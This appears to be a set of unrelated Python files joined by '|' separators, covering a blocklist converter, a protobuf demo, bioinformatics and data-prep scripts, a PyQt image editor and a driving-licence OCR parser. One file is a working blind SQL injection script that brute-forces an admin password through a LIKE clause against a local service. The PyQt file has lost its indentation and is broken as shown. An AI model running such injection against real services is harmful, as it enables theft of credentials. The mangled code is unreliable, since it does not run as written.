        "all" to run every standard action.

    NOTE(review): for action == "all" this reads the module-level
    `action_candidates` list defined under the __main__ guard, so calling
    run("all") from an import would raise NameError -- confirm the function
    is intended for script use only.
    """
    # Create converter instance and read input file.
    converter = DomainBlocklistConverter()
    converter.read()
    # Invoke special action "json".
    if action == "json":
        converter.dump()
        sys.exit()
    # Either invoke specific action, or expand to all actions.
    if action == "all":
        subcommands = action_candidates
    else:
        subcommands = [action]
    # Invoke all actions subsequently.
    for action in subcommands:
        print(f"Invoking subcommand '{action}'")
        method = getattr(converter, action)
        method()
if __name__ == "__main__":
    # Read subcommand from command line, with error handling.
    action_candidates = ["pihole", "unbound", "adguard", "categories"]
    special_candidates = ["all", "duplicates", "json"]
    # FIX: take the first CLI argument if present. The original used a bare
    # `try/except: pass`, which also swallowed unrelated errors.
    subcommand = sys.argv[1] if len(sys.argv) > 1 else None
    if subcommand not in action_candidates + special_candidates:
        print(
            f"ERROR: Subcommand not given or invalid, please use one of {action_candidates + special_candidates}"
        )
        sys.exit(1)
    # Invoke subcommand.
    run(subcommand)
|
import httplib
import urllib
import json
def sql_injection():
    # Blind SQL injection demo against a local test service: recovers a
    # password one character at a time by probing with LIKE-prefix patterns.
    # Python 2 code (httplib module, print statements).
    username = "admin\" AND password LIKE \""
    chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890"
    password = ""
    while True:
        end = True
        for char in chars:
            # Candidate prefix: everything recovered so far plus one character.
            try_password = password + char
            # The injected username closes the quoted string and adds a
            # LIKE condition on the password column.
            body = {
                "username": username + try_password + "%",
                "password": "abc"
            }
            params = json.dumps(body)
            headers = {"Content-type":"application/json"}
            conn = httplib.HTTPConnection("localhost:8080")
            conn.request("POST", "/v1/user", params, headers)
            res = conn.getresponse()
            # "already in use" in the response means the injected LIKE
            # matched, i.e. the candidate prefix is correct.
            if res.read().find("already in use") != -1:
                password = try_password
                print password
                conn.close()
                end = False
                break
            conn.close()
        # No character extended the prefix: the full password was found.
        if end:
            print
            print "Found password"
            print password
            break

if __name__ == "__main__":
    sql_injection()
|
from kv_db_interface import KeyValueDatabaseInterface
import annoucement_pb2 as announcement_message
def main():
    """Round-trip demo: serialize an Annoucement protobuf message into a
    key-value store, read it back, and deserialize it.

    NOTE(review): 'Annoucement' (sic) is the name generated from
    annoucement_pb2 -- the typo comes from the .proto definition, so it
    cannot be corrected here.
    """
    kv_db = KeyValueDatabaseInterface(connection_string="sqlite:///proto_buf.db")

    # Build the message to store.
    message_to_serialize = announcement_message.Annoucement()
    message_to_serialize.sender = "Mikey"
    message_to_serialize.recipients.extend(['Joey', 'Sammy'])
    message_to_serialize.message = "S.O.S."

    print("The following the printed Protbuf object:")
    print(message_to_serialize)
    print("This is how it showed up serialized:")
    print(message_to_serialize.SerializeToString())

    # Store the message under a fixed key (the interface presumably
    # serializes it -- confirm against KeyValueDatabaseInterface).
    print("Inserting the message...")
    kv_db.insert("message1", message_to_serialize)

    print("Retrieving the message...")
    serialized_message_from_db = kv_db.get("message1").value
    print("This is how it looks like in after it is retrieve from the database:")
    print(serialized_message_from_db)

    # Parse the stored bytes back into a fresh message object.
    print("Deserializing...")
    deserialized_object = announcement_message.Annoucement()
    deserialized_object.ParseFromString(serialized_message_from_db)
    print("Done. This is the deserialized message from the database:")
    print(deserialized_object)

if __name__ == "__main__":
    try:
        main()
    except KeyboardInterrupt:
        print("Program ended by user.")
        exit(0)
|
#!/usr/bin/env python3
"""
The initial use case for this script was needing a tool to append version numbers to all
entries within the FASTA file.
For example, if you start with a header lines like this:
>transcript1_comp4_path3
>transcript1_comp4_path5
And you run this script like this:
./append_to_fasta_header.py -i foo.fna -o bar.fna -s '.1'
Then the new file will have the following headers:
>transcript1_comp4_path3.1
>transcript1_comp4_path5.1
Author: Joshua Orvis (jorvis AT gmail)
"""
import argparse
import gzip
import re
import sys
def main():
    """Append a suffix to every FASTA header identifier and write the result.

    Command-line arguments:
      -i/--input_file  : FASTA file to read (gzip supported via .gz suffix)
      -o/--output_file : destination file (stdout when omitted)
      -s/--suffix      : string appended to each sequence identifier

    :raises Exception: if a '>' line has no identifier after it.
    """
    parser = argparse.ArgumentParser( description='Append strings to the end of FASTA read headers')

    ## output file to be written
    parser.add_argument('-i', '--input_file', type=str, required=True, help='Path to an input file to be read (gzip supported)' )
    parser.add_argument('-o', '--output_file', type=str, required=False, help='Path to an output file to be created' )
    parser.add_argument('-s', '--suffix', type=str, required=True, help='String to be appended to each sequence header' )
    args = parser.parse_args()

    linenum = 0

    if args.output_file is None:
        ofh = sys.stdout
    else:
        ofh = open( args.output_file, 'wt' )

    if args.input_file.endswith('.gz'):
        fh = gzip.open( args.input_file, 'rb')
        is_compressed = True
    else:
        # FIX: 'rU' (explicit universal-newline mode) was removed in
        # Python 3.11; plain text mode has the same newline behaviour.
        fh = open(args.input_file, 'r')
        is_compressed = False

    # FIX: raw string avoids the invalid-escape warning for \S; compiled
    # once since it is applied to every header line.
    header_re = re.compile(r'>(\S+)(.*)')

    for line in fh:
        if is_compressed:
            line = line.decode()

        linenum += 1

        if line.startswith('>'):
            m = header_re.match(line)
            if m:
                # identifier + suffix + remainder of the header line
                ofh.write(">{0}{1}{2}\n".format(m.group(1), args.suffix, m.group(2)))
            else:
                raise Exception("ERROR: Found a possible > entry with no identifier on line {0}".format(linenum))
        else:
            ofh.write(line)

    # FIX: close the input handle, and never close sys.stdout (the original
    # closed ofh unconditionally, closing stdout when -o was omitted).
    fh.close()
    if ofh is not sys.stdout:
        ofh.close()

if __name__ == '__main__':
    main()
|
from netapp.netapp_object import NetAppObject
class ProcessorComplexInfo(NetAppObject):
    """
    Available information on the processor complex modules (PCMs)
    in the shelf.

    Value object in the generated NetApp API style: each attribute is a
    private field with a validating property setter, plus static metadata
    describing the API element names and types.
    """
    # Backing field for is_pcm_element_not_installed (optional bool).
    _is_pcm_element_not_installed = None
    @property
    def is_pcm_element_not_installed(self):
        """
        Indicates if PCM element has been installed. Will
        be present only if the element is not installed, in
        which case no further information will be provided.
        """
        return self._is_pcm_element_not_installed
    @is_pcm_element_not_installed.setter
    def is_pcm_element_not_installed(self, val):
        # Validation (inherited from NetAppObject) only applies to
        # non-None values; None clears the field.
        if val != None:
            self.validate('is_pcm_element_not_installed', val)
        self._is_pcm_element_not_installed = val

    # Backing field for pcm_element_no (required int).
    _pcm_element_no = None
    @property
    def pcm_element_no(self):
        """
        PCM element number
        """
        return self._pcm_element_no
    @pcm_element_no.setter
    def pcm_element_no(self, val):
        if val != None:
            self.validate('pcm_element_no', val)
        self._pcm_element_no = val

    # Backing field for is_pcm_element_error (optional bool).
    _is_pcm_element_error = None
    @property
    def is_pcm_element_error(self):
        """
        Indicates if there has been a failure in the PCM.
        Will not be present if a PCM element is not installed.
        """
        return self._is_pcm_element_error
    @is_pcm_element_error.setter
    def is_pcm_element_error(self, val):
        if val != None:
            self.validate('is_pcm_element_error', val)
        self._is_pcm_element_error = val

    @staticmethod
    def get_api_name():
        # Name of the corresponding API element.
        return "processor-complex-info"

    @staticmethod
    def get_desired_attrs():
        # API attribute names (hyphenated form) requested from the server.
        return [
            'is-pcm-element-not-installed',
            'pcm-element-no',
            'is-pcm-element-error',
        ]

    def describe_properties(self):
        # Type/requiredness metadata used by the base class for
        # (de)serialization and validation.
        return {
            'is_pcm_element_not_installed': { 'class': bool, 'is_list': False, 'required': 'optional' },
            'pcm_element_no': { 'class': int, 'is_list': False, 'required': 'required' },
            'is_pcm_element_error': { 'class': bool, 'is_list': False, 'required': 'optional' },
        }
|
#!/usr/bin/env python3
# Copyright (c) 2008-10 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.
import os
import platform
import sys
from PyQt5.Qt import QT_VERSION_STR, PYQT_VERSION_STR
from PyQt5.QtCore import (
Qt,
QSettings,
QByteArray,
QTimer,
QFile,
QFileInfo,
)
from PyQt5.QtGui import (
QImage,
QImageReader,
QImageWriter,
QKeySequence,
QIcon,
QPainter,
QPixmap,
)
from PyQt5.QtPrintSupport import QPrinter, QPrintDialog
from PyQt5.QtWidgets import (
QApplication,
QMainWindow,
QDockWidget,
QLabel,
QMessageBox,
QSpinBox,
QFrame,
QListWidget,
QAction,
QActionGroup,
QFileDialog,
QInputDialog,
)
from gui.mainWindow import newimagedlg, helpform
import gui.mainWindow.qrc_resources
__version__ = "1.0.1"
class MainWindow(QMainWindow):
def __init__(self, parent=None):
super(MainWindow, self).__init__(parent)
self.image = QImage()
self.dirty = False
self.filename = None
self.mirroredvertically = False
self.mirroredhorizontally = False
self.imageLabel = QLabel()
self.imageLabel.setMinimumSize(200, 200)
self.imageLabel.setAlignment(Qt.AlignCenter)
self.imageLabel.setContextMenuPolicy(Qt.ActionsContextMenu)
self.setCentralWidget(self.imageLabel)
logDockWidget = QDockWidget("Log", self)
logDockWidget.setObjectName("LogDockWidget")
logDockWidget.setAllowedAreas(Qt.LeftDockWidgetArea |
Qt.RightDockWidgetArea)
self.listWidget = QListWidget()
logDockWidget.setWidget(self.listWidget)
self.addDockWidget(Qt.RightDockWidgetArea, logDockWidget)
self.printer = None
self.sizeLabel = QLabel()
self.sizeLabel.setFrameStyle(
QFrame.StyledPanel | QFrame.Sunken)
status = self.statusBar()
status.setSizeGripEnabled(False)
status.addPermanentWidget(self.sizeLabel)
status.showMessage("Ready", 5000)
fileNewAction = self.createAction(
"&New...",
self.fileNew,
QKeySequence.New,
"filenew",
"Create an image file")
fileOpenAction = self.createAction(
"&Open...",
self.fileOpen,
QKeySequence.Open,
"fileopen",
"Open an existing image file")
fileSaveAction = self.createAction(
"&Save",
self.fileSave,
QKeySequence.Save,
"filesave",
"Save the image")
fileSaveAsAction = self.createAction(
"Save &As...",
self.fileSaveAs,
icon="filesaveas",
tip="Save the image using a new name")
filePrintAction = self.createAction(
"&Print",
self.filePrint,
QKeySequence.Print,
"fileprint",
"Print the image")
fileQuitAction = self.createAction(
"&Quit",
self.close,
"Ctrl+Q",
"filequit",
"Close the application")
editInvertAction = self.createAction(
"&Invert",
self.editInvert,
"Ctrl+I",
"editinvert",
"Invert the image's colors",
True,
"toggled")
editSwapRedAndBlueAction = self.createAction(
"Sw&ap Red and Blue",
self.editSwapRedAndBlue,
"Ctrl+A",
"editswap",
"Swap the image's red and blue color components",
True,
"toggled")
editZoomAction = self.createAction(
"&Zoom...",
self.editZoom,
"Alt+Z",
"editzoom",
"Zoom the image")
mirrorGroup = QActionGroup(self)
editUnMirrorAction = self.createAction(
"&Unmirror",
self.editUnMirror,
"Ctrl+U",
"editunmirror",
"Unmirror the image",
True,
"toggled")
mirrorGroup.addAction(editUnMirrorAction)
editMirrorHorizontalAction = self.createAction(
"Mirror &Horizontally",
self.editMirrorHorizontal,
"Ctrl+H",
"editmirrorhoriz",
"Horizontally mirror the image",
True,
"toggled")
mirrorGroup.addAction(editMirrorHorizontalAction)
editMirrorVerticalAction = self.createAction(
"Mirror &Vertically",
self.editMirrorVertical,
"Ctrl+V",
"editmirrorvert",
"Vertically mirror the image",
True,
"toggled")
mirrorGroup.addAction(editMirrorVerticalAction)
editUnMirrorAction.setChecked(True)
helpAboutAction = self.createAction(
"&About Image Changer",
self.helpAbout)
helpHelpAction = self.createAction(
"&Help",
self.helpHelp,
QKeySequence.HelpContents)
self.fileMenu = self.menuBar().addMenu("&File")
self.fileMenuActions = (
fileNewAction,
fileOpenAction,
fileSaveAction,
fileSaveAsAction,
None,
filePrintAction,
fileQuitAction)
self.fileMenu.aboutToShow.connect(self.updateFileMenu)
# self.connect(self.fileMenu, SIGNAL("aboutToShow()"),
# self.updateFileMenu)
editMenu = self.menuBar().addMenu("&Edit")
self.addActions(editMenu,(editInvertAction, editSwapRedAndBlueAction, editZoomAction))
mirrorMenu = editMenu.addMenu(
QIcon(":/editmirror.png"),
"&Mirror")
self.addActions(mirrorMenu,(editUnMirrorAction,editMirrorHorizontalAction,editMirrorVerticalAction))
helpMenu = self.menuBar().addMenu("&Help")
self.addActions(helpMenu, (helpAboutAction, helpHelpAction))
fileToolbar = self.addToolBar("File")
fileToolbar.setObjectName("FileToolBar")
self.addActions(fileToolbar,(fileNewAction, fileOpenAction, fileSaveAsAction))
editToolbar = self.addToolBar("Edit")
editToolbar.setObjectName("EditToolBar")
self.addActions(editToolbar,(editInvertAction,editSwapRedAndBlueAction,editUnMirrorAction,editMirrorVerticalAction,editMirrorHorizontalAction))
self.zoomSpinBox = QSpinBox()
self.zoomSpinBox.setRange(1, 400)
self.zoomSpinBox.setSuffix(" %")
self.zoomSpinBox.setValue(100)
self.zoomSpinBox.setToolTip("Zoom the image")
self.zoomSpinBox.setStatusTip(self.zoomSpinBox.toolTip())
self.zoomSpinBox.setFocusPolicy(Qt.NoFocus)
self.zoomSpinBox.valueChanged[int].connect(self.showImage)
editToolbar.addWidget(self.zoomSpinBox)
self.addActions(self.imageLabel,(editInvertAction,editSwapRedAndBlueAction,editUnMirrorAction,editMirrorVerticalAction,editMirrorHorizontalAction))
self.resetableActions = ((editInvertAction, False),
(editSwapRedAndBlueAction, False),
(editUnMirrorAction, True))
settings = QSettings()
self.recentFiles = settings.value("RecentFiles") or []
self.restoreGeometry(
settings.value("MainWindow/Geometry", QByteArray()))
self.restoreState(
settings.value("MainWindow/State", QByteArray()))
self.setWindowTitle("Image Changer")
self.updateFileMenu()
QTimer.singleShot(0, self.loadInitialFile)
def createAction(self, text, slot=None, shortcut=None, icon=None,
tip=None, checkable=False, signal="triggered"):
action = QAction(text, self)
if icon is not None:
action.setIcon(QIcon(":/{}.png".format(icon)))
if shortcut is not None:
action.setShortcut(shortcut)
if tip is not None:
action.setToolTip(tip)
action.setStatusTip(tip)
if slot is not None:
# self.connect(action, SIGNAL(signal), slot)
getattr(action, signal).connect(slot)
if checkable:
action.setCheckable(True)
return action
def addActions(self, target, actions):
for action in actions:
if action is None:
target.addSeparator()
else:
target.addAction(action)
def closeEvent(self, event):
if self.okToContinue():
settings = QSettings()
settings.setValue("LastFile", self.filename)
settings.setValue("RecentFiles", self.recentFiles or [])
settings.setValue("MainWindow/Geometry", self.saveGeometry())
settings.setValue("MainWindow/State", self.saveState())
else:
event.ignore()
def okToContinue(self):
if self.dirty:
reply = QMessageBox.question(
self,
"Image Changer - Unsaved Changes",
"Save unsaved changes?",
QMessageBox.Yes | QMessageBox.No | QMessageBox.Cancel)
if reply == QMessageBox.Cancel:
return False
elif reply == QMessageBox.Yes:
return self.fileSave()
return True
def loadInitialFile(self):
settings = QSettings()
fname = settings.value("LastFile")
if fname and QFile.exists(fname):
self.loadFile(fname)
def updateStatus(self, message):
self.statusBar().showMessage(message, 5000)
self.listWidget.addItem(message)
if self.filename:
self.setWindowTitle("Image Changer - {}[*]".format(
os.path.basename(self.filename)))
elif not self.image.isNull():
self.setWindowTitle("Image Changer - Unnamed[*]")
else:
self.setWindowTitle("Image Changer[*]")
self.setWindowModified(self.dirty)
def updateFileMenu(self):
self.fileMenu.clear()
self.addActions(self.fileMenu, self.fileMenuActions[:-1])
current = self.filename
recentFiles = []
for fname in self.recentFiles:
if fname != current and QFile.exists(fname):
recentFiles.append(fname)
if recentFiles:
self.fileMenu.addSeparator()
for i, fname in enumerate(recentFiles):
action = QAction(
QIcon(":/icon.png"),
"&{} {}".format(i + 1, QFileInfo(fname).fileName()), self)
action.setData(fname)
action.triggered.connect(self.loadFile)
# self.connect(action, SIGNAL("triggered()"),
# self.loadFile)
self.fileMenu.addAction(action)
self.fileMenu.addSeparator()
self.fileMenu.addAction(self.fileMenuActions[-1])
def fileNew(self):
if not self.okToContinue():
return
dialog = newimagedlg.NewImageDlg(self)
if dialog.exec_():
self.addRecentFile(self.filename)
self.image = QImage()
for action, check in self.resetableActions:
action.setChecked(check)
self.image = dialog.image()
self.filename = None
self.dirty = True
self.showImage()
self.sizeLabel.setText("{} x {}".format(
self.image.width(), self.image.height()))
self.updateStatus("Created new image")
def fileOpen(self):
if not self.okToContinue():
return
dir_ = (os.path.dirname(self.filename)
if self.filename is not None else ".")
formats = (
["*.{}".format(format.data().decode("ascii").lower())
for format in QImageReader.supportedImageFormats()]
)
filter = "Image files ({})".format(" ".join(formats))
print(filter)
fdialog_tuple = QFileDialog.getOpenFileName(
self,
"Image Changer - Choose Image",
dir_,
filter)
fname = fdialog_tuple[0]
if fname:
self.loadFile(fname)
def loadFile(self, fname=None):
if fname is None:
action = self.sender()
if isinstance(action, QAction):
fname = action.data()
if not self.okToContinue():
return
else:
return
if fname:
if isinstance(fname, tuple):
fname = fname[0]
# print (fname)
# import pdb
# pdb.set_trace()
self.filename = None
image = QImage(fname)
if image.isNull():
message = "Failed to read {}".format(fname)
else:
self.addRecentFile(fname)
self.image = QImage()
for action, check in self.resetableActions:
action.setChecked(check)
self.image = image
self.filename = fname
self.showImage()
self.dirty = False
self.sizeLabel.setText("{} x {}".format(
image.width(), image.height()))
message = "Loaded {}".format(os.path.basename(fname))
self.updateStatus(message)
def addRecentFile(self, fname):
if fname is None:
return
if fname not in self.recentFiles:
self.recentFiles = [fname] + self.recentFiles[:8]
def fileSave(self):
if self.image.isNull():
return True
if self.filename is None:
return self.fileSaveAs()
else:
if self.image.save(self.filename, None):
self.updateStatus("Saved as {}".format(self.filename))
self.dirty = False
return True
else:
self.updateStatus("Failed to save {}".format(
self.filename))
return False
def fileSaveAs(self):
if self.image.isNull():
return True
fname = self.filename if self.filename is not None else "."
formats = (["*.{}".format(format.data().decode("ascii").lower())
for format in QImageWriter.supportedImageFormats()])
fdialog_tuple = QFileDialog.getSaveFileName(
self,
"Image Changer - Save Image",
fname,
"Image files ({})".format(" ".join(formats)))
fname = fdialog_tuple[0]
if fname:
if "." not in fname:
fname += ".png"
self.addRecentFile(fname)
self.filename = fname
return self.fileSave()
return False
def filePrint(self):
if self.image.isNull():
return
if self.printer is None:
self.printer = QPrinter(QPrinter.HighResolution)
self.printer.setPageSize(QPrinter.Letter)
form = QPrintDialog(self.printer, self)
if form.exec_():
painter = QPainter(self.printer)
rect = painter.viewport()
size = self.image.size()
size.scale(rect.size(), Qt.KeepAspectRatio)
painter.setViewport(rect.x(), rect.y(), size.width(),
size.height())
painter.drawImage(0, 0, self.image)
def editInvert(self, on):
if self.image.isNull():
return
self.image.invertPixels()
self.showImage()
self.dirty = True
self.updateStatus("Inverted" if on else "Uninverted")
def editSwapRedAndBlue(self, on):
if self.image.isNull():
return
self.image = self.image.rgbSwapped()
self.showImage()
self.dirty = True
self.updateStatus(("Swapped Red and Blue"
if on else "Unswapped Red and Blue"))
def editUnMirror(self):
if self.image.isNull():
return
if self.mirroredhorizontally:
self.editMirrorHorizontal(False)
if self.mirroredvertically:
self.editMirrorVertical(False)
def editMirrorHorizontal(self, on):
if self.image.isNull():
return
self.image = self.image.mirrored(True, False)
self.showImage()
self.mirroredhorizontally = not self.mirroredhorizontally
self.dirty = True
self.updateStatus(("Mirrored Horizontally"
if on else "Unmirrored Horizontally"))
def editMirrorVertical(self, on):
if self.image.isNull():
return
self.image = self.image.mirrored(False, True)
self.showImage()
self.mirroredvertically = not self.mirroredvertically
self.dirty = True
self.updateStatus(("Mirrored Vertically"
if on else "Unmirrored Vertically"))
def editZoom(self):
if self.image.isNull():
return
percent, ok = QInputDialog.getInt(
self,
"Image Changer - Zoom", "Percent:",
self.zoomSpinBox.value(), 1, 400)
if ok:
self.zoomSpinBox.setValue(percent)
def showImage(self, percent=None):
if self.image.isNull():
return
if percent is None:
percent = self.zoomSpinBox.value()
factor = percent / 100.0
width = self.image.width() * factor
height = self.image.height() * factor
image = self.image.scaled(width, height, Qt.KeepAspectRatio)
self.imageLabel.setPixmap(QPixmap.fromImage(image))
    def helpAbout(self):
        """Show the About box with application, Python, Qt and OS versions."""
        QMessageBox.about(
            self,
            "About Image Changer",
            """<b>Image Changer</b> v {0}
            <p>Copyright © 2008-10 Qtrac Ltd.
            All rights reserved.
            <p>This application can be used to perform
            simple image manipulations.
            <p>Python {1} - Qt {2} - PyQt {3} on {4}""".format(
                __version__, platform.python_version(),
                QT_VERSION_STR, PYQT_VERSION_STR,
                platform.system()))
def helpHelp(self):
form = helpform.HelpForm("index.html", self)
form.show()
def main():
    """Create the QApplication, configure app identity, and run the UI."""
    app = QApplication(sys.argv)
    app.setOrganizationName("Qtrac Ltd.")
    app.setOrganizationDomain("qtrac.eu")
    app.setApplicationName("Image Changer")
    app.setWindowIcon(QIcon(":/icon.png"))
    window = MainWindow()
    window.show()
    app.exec_()


main()
|
import sys
import numpy as np
import pandas as pd
from google.cloud import bigquery
import pandas_gbq as gbq
def shRNAPreprocess(input_data, col_name):
    '''
    Description: Preprocesses DEPMAP DEMETER2 data and converts it into long format
    Inputs:
        input_data: dataframe, either gene expression, cnv or gene effect
        col_name: string, the column name for measurements e.g CNA
    Output:
        long_table: dataframe, long format of the input data given in wide format
    '''
    # DEMETER2 matrices are gene x cell-line; transpose so rows are cell
    # lines, then reuse the CRISPR converter with the CCLE_ID sample column.
    transposed = input_data.copy(deep=False).T
    return CRISPRPreprocess(transposed, col_name, 'CCLE_ID')
def CRISPRPreprocess(input_data, col_name, id='DepMap_ID'):
    '''
    Description: Preprocesses DEPMAP CRISPR data and converts it into long format
    Inputs:
        input_data: dataframe in wide format; rows are samples, columns are
            "HUGO_SYMBOL (ENTREZ_ID)" strings
        col_name: string, the column name for measurements e.g CNA
        id: string, name for the sample-identifier column in the output
    Output:
        long_table: dataframe with columns [Entrez_ID, Hugo_Symbol, id, col_name]
    '''
    data = input_data.copy(deep=False)
    gene_names = [colname.split(' (')[0] for colname in data.columns]
    entrez_ids = [colname.split('(', 1)[1].split(')')[0] for colname in data.columns]
    # Drop columns whose Entrez ID is missing; the two previous
    # copy-pasted loops for 'NA' and 'nan' are merged into one pass.
    missing = {'NA', 'nan'}
    index_rem_list = [i for i, e in enumerate(entrez_ids) if e in missing]
    if index_rem_list:
        data = data.drop(data.columns[index_rem_list], axis=1)
        for index in sorted(index_rem_list, reverse=True):
            del entrez_ids[index]
            del gene_names[index]
    gene_entrez_map = dict(zip(gene_names, entrez_ids))
    data.columns = gene_names
    # Wide -> long: unstack yields a (gene, sample) MultiIndex series.
    long_table = data.unstack().reset_index()
    # Direct column assignment: set_axis(..., inplace=...) was removed in
    # pandas 2.0, so the old call raises TypeError on current pandas.
    long_table.columns = ['Hugo_Symbol', id, col_name]
    long_table['Entrez_ID'] = [gene_entrez_map.get(x) for x in long_table['Hugo_Symbol']]
    # long_table['Entrez_ID']= pd.to_numeric(long_table['Entrez_ID'])
    long_table = long_table[['Entrez_ID', 'Hugo_Symbol', id, col_name]]
    return (long_table)
|
from .dataset import *
from .coco import *
from .balloon import *
from .fintabnet import *
|
# The MIT License (MIT)
#
# Copyright (c) 2018 stanwood GmbH
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
import base64
import json
import logging
import re
from google.appengine.api import (
app_identity,
urlfetch,
)
import dateutil.parser
class OcrModel(object):
    """Base class for extracting labeled fields from OCR'd text.

    Subclasses declare class attributes that are BaseText instances;
    __init__ replaces each one on the instance with the result of
    searching the OCR text with that field's regex.
    """
    class BaseText(object):
        # Wraps a compiled regex; search() returns the stripped first
        # match, or None when the pattern does not match.
        def __init__(self, pattern):
            self.pattern = pattern
        def search(self, text):
            try:
                return self.pattern.search(text).group(0).strip()
            except AttributeError:
                # pattern.search() returned None -> no match.
                return None
    class TextAfter(BaseText):
        # Matches text of shape `fmt` that follows marker `a` (lookbehind).
        def __init__(self, a, fmt=r'.*?'):
            super(OcrModel.TextAfter, self).__init__(
                re.compile(
                    r'(?<={})\s*{}'.format(a, fmt),
                    re.UNICODE,
                ),
            )
    class TextBetween(BaseText):
        # Matches text of shape `fmt` between markers `a` and `b`
        # (lookbehind + lookahead); DOTALL lets the value span lines.
        def __init__(self, a, b, fmt=r'.*?'):
            super(OcrModel.TextBetween, self).__init__(
                re.compile(
                    r'(?<={}){}(?={})'.format(a, fmt, b),
                    re.UNICODE | re.DOTALL,
                ),
            )
    class StringField(TextBetween):
        # Value printed between two numbered labels "\n<a>." and "\n<b>.".
        def __init__(self, a, b):
            super(OcrModel.StringField, self).__init__(
                r'\n{}[\.,]'.format(a),
                r'\n{}[\.,]'.format(b),
            )
    class DateField(TextAfter):
        # Date (dd.mm.yy[yy] or dd-mm-yy[yy]) after label "\n<a>.";
        # search() normalizes it to dd.mm.YYYY.
        def __init__(self, a):
            super(OcrModel.DateField, self).__init__(
                r'\n{}[\.,]'.format(a),
                r'\d{2}[\.-]\d{2}[\.-](\d{2}|\d{4})\b',
            )
        def search(self, text):
            value = super(OcrModel.DateField, self).search(text)
            try:
                value = dateutil.parser.parse(
                    value,
                    dayfirst=True,
                )
                value = value.strftime('%d.%m.%Y')
            except (
                TypeError,   # no regex match -> value is None
                ValueError,  # matched text is not a parsable date
            ):
                value = None
            return value
    def __init__(self, text):
        logging.debug(text)
        # Resolve every declared BaseText field against the OCR text and
        # shadow the class attribute with the extracted instance value.
        for name in dir(self.__class__):
            attr = getattr(self.__class__, name)
            if isinstance(attr, OcrModel.BaseText):
                setattr(self, name, attr.search(text))
class DrivingLicence(OcrModel):
    """Extracts the numbered fields of a driving licence from a photo.

    The constructor sends the image to the Google Cloud Vision
    TEXT_DETECTION endpoint (via App Engine urlfetch), then parses the
    recognised text with the field patterns declared below.
    """
    # Honorifics that OCR may place in front of the first name.
    TITLES = (
        u'MISS ',
        u'MR ',
        u'MRS ',
        u'MS ',
    )
    lastname = OcrModel.StringField('1', '2')
    firstname = OcrModel.StringField('2', '3')
    middlename = None  # split out of firstname in __init__
    title = None       # stripped from firstname in __init__
    birthdate = OcrModel.DateField('3')
    issued = OcrModel.DateField('4a')
    expiry = OcrModel.DateField('4b')
    issued_by = OcrModel.TextBetween(
        r'\b4c[\.,]',
        r'\n',
        r'[\w ]+',
    )
    number = OcrModel.TextBetween(
        r'\b5[\.,]',
        r'\n',
        r'[\w\- ]+',
    )
    # UK licence numbers have their own fixed structure (surname code,
    # encoded birth date, initials, check digits), matched permissively
    # to tolerate OCR spacing.
    number_uk = OcrModel.TextBetween(
        r'\b',
        r' \d{2}\n',
        r' *([A-Z9] ?){5}\d ?([05] ?[1-9]|[16] ?[012]) ?(0 ?[1-9]|[12] ?\d|3 ?[01]) ?\d ?([A-Z9] ?){2}\d ?([A-Z] ?){2}(\d ?){0,2}',
    )
    address = OcrModel.StringField('8', '9')
    category = OcrModel.TextBetween(
        '\n9[\.,]',
        '\n',
    )
    city = None         # split out of address in __init__
    postal_code = None  # split out of address in __init__
    def __init__(self, source=None, content=None):
        """OCR a licence image.

        Args:
            source: Cloud Storage URI of the image, or
            content: raw image bytes (base64-encoded for the request).
        If both are given, source wins.
        """
        if source:
            image = {
                'source': {
                    'gcsImageUri': source,
                }
            }
        else:
            image = {
                'content': base64.b64encode(content),
            }
        # Service-account token for the Vision API call.
        access_token = app_identity.get_access_token(
            scopes=(
                'https://www.googleapis.com/auth/cloud-platform',
                'https://www.googleapis.com/auth/cloud-vision',
            ),
        )[0]
        response = urlfetch.fetch(
            'https://vision.googleapis.com/v1p2beta1/images:annotate',
            method='POST',
            payload=json.dumps({
                'requests': [
                    {
                        'image': image,
                        'features': [
                            {
                                'type': 'TEXT_DETECTION',
                            },
                        ],
                        'imageContext': {},
                    }
                ]
            }),
            headers={
                'Authorization': 'Bearer {}'.format(access_token),
                'Content-Type': 'application/json',
            }
        )
        response = json.loads(response.content)
        try:
            # First annotation is the full recognised text block.
            source = response['responses'][0]['textAnnotations'][0]['description']
        except LookupError:
            source = ''
        # Run the declared field patterns over the recognised text.
        super(DrivingLicence, self).__init__(source)
        if self.firstname:
            self.firstname = self.firstname.replace('\n', ' ')
            # Peel a leading honorific off the first name, if present.
            for title in self.TITLES:
                if self.firstname.startswith(title):
                    self.firstname = self.firstname.replace(title, u'')
                    self.title = title.rstrip(' ')
                    break
            # Anything after the first space is treated as middle name(s).
            try:
                self.firstname, self.middlename = self.firstname.split(
                    ' ',
                    1,
                )
            except ValueError:
                pass
        # Prefer the structured UK number when it was recognised.
        if self.number_uk:
            self.number = self.number_uk
        if self.number:
            self.number = self.number.replace(' ', '')
        # Address is "street..., city, postcode" when OCR got all parts.
        if self.address:
            try:
                self.address, self.city, self.postal_code = self.address.rsplit(', ', 2)
            except ValueError:
                pass
|
import pickle as cPickle
from parameters import CNN_Parameter, Or_Parameter
import tensorflow as tf
